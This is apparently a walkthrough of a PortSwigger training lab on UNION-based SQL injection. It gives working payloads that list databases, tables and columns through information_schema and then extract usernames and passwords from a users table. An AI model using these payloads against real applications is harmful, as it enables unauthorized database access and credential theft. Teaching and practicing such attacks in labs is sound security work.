SQL injection UNION attack, retrieving data from other tables
https://portswigger.net/web-security/sql-injection/union-attacks/lab-retrieve-data-from-other-tables
Level: Practitioner
In this lab I will show how to enumerate databases, tables and columns using a UNION-based attack.
First, we need to know the number of columns returned by the query that we are injecting into.
You can do this as shown in the following image, or you can use ORDER BY instead.
To get all the database names, use the following payload.
' Union select schema_name,NULL from information_schema.schemata-- -
A simple breakdown of what this expression means:
information_schema.schemata - list me the DB names.
schema_name - get me back the DB names.
Now that we know the DB name that we want, we need to get the names of the tables.
Use the following payload to retrieve the names of the tables.
' Union select table_name,NULL from information_schema.tables where table_schema = 'DB_NAME' -- -
Breakdown
information_schema.tables - list me all the tables.
table_name - get me back the name of the tables.
table_schema - name of the database we want to use.
Now we use the following payload to get the columns of the table that we want.
' Union select column_name,NULL from information_schema.columns where table_name = 'TABLE_NAME' -- -
Breakdown
column_name - get me the names of the columns.
information_schema.columns - list me all the columns.
table_name - this selects the table that we want to get info about.
Now that we know the columns that we want to extract data from, I like to use the following.
' Union select NULL,username||':'||password from users -- -
Breakdown
username||':'||password - this joins both values into one column, to present the data in a more readable way.
*Important*
If you don't understand the SQL logic and how to write these queries, I recommend practicing in a virtual lab where you build the DB and break it yourself.